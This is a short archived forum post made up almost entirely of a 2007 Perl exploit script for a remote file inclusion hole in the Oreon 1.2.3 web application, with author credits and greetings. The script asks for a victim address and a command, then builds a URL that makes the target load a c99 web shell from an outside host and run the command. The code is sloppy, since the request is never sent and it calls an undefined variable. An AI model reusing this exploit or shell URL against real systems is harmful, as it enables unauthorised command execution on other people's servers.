Oreon1.2.x Series Exploit Coded Feb 11 2007 01:30PM
hotturk mynet com
#[ Coded : H0tTurk-]
#[ Author: DrmaxVirus
#[ web app : Oreon1.2.3 Remote File İnclude ]
#[ My Site : WwW.H0tTurk.CoM ]
#[Referance:http://www.milw0rm.com/exploits/3150
#[ Thanx : DrmaxVirus,GencTurk,Madconfig,EnjexioN,TiT,Kurtefendy,LuciferCihan,Arabi
an-FighterZ,Sawturk,Ayyildiz,OzelHarekatTim f4cked238 ]
$rfi = "index.php?file=";
$path = "/";
$shell = "http://redhat.by.ru/c99.txt?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) H0tTurk\n";
&ex;
}
elsif($dil eq "Turkce"){
print "H0tTurk\n";
&ex;
}
else {print "Selection Language\n"; exit;}
sub ex{
$not = "Victim is Not Zox.\n" and $not_cmd = "Not Doing xpl.\n"
and $vic = "Shell Adress? with start http:// :" and $thx = "Yeah " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Not Found\n" and $not_cmd = "Error Rfi\n"
and $vic = "Example http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "eyw " and $komt = "Command?:"
if $dil eq "Turkce";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) H0tTurk AyT\n$g3rt: Drmax\n";
sleep 3;
system("start $wait");
}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus